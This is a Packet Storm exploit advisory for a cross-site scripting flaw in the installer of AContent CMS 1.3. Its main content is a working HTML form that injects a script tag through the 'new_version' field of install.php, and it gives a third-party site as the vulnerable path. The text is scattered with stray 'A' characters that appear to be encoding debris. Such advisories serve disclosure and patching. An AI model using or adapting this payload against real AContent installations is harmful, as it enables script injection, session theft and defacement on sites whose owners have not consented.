AContent CMS 1.3 Cross Site Scripting

2016-12-31T00:00:00
ID PACKETSTORM:140306
Type packetstorm
Reporter M.R.S.L.Y
Modified 2016-12-31T00:00:00

Description

                                        
                                            `|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|  
|=============================================================|  
|[+] Exploit Title:A Cross Site Scripting in AContent Content Management System  
|[+]  
|[+] Exploit Author: Ashiyane Digital Security Team  
|[+]  
|[+] Download Link : https://sourceforge.net/projects/acontent/files/AContent-1.3.tar.gz/download  
|[+]   
|[+] Version : 1.3|[+]  
|[+] Vendor : http://www.atutor.ca/acontent/  
|[+]  
|[+] Tested on:A Kali Linux   
|[+]  
|[+] Date: 12 /29 / 2016  
|=============================================================|  
|[+] Vuln Path : http://www.site.go.th/AContent/install/install.php  
|[+] Method : POST  
|=============================================================|  
|[+] Exploit Code:   
A   
<form action="127.0.0.1/5/AContent/install/install.php" method="post" name="form">  
A A A <input type="hidden" name="action" value="process" />  
A A A <input type="hidden" name="step" value="1" />  
A A A <input type="hidden" name="new_version" value="1.3'"/><ScRiPt >alert(123)</ScRiPt>" />  
A A A   
A A A <input type="submit" name="submit" class="button" value="I Agree" />   
A A A A A A A <input type="submit" name="submit" class="button" value="I Disagree" /><br />  
A A A   
</form>  
  
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|  
|[+] Discovered By : M.R.S.L.Y  
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|   
`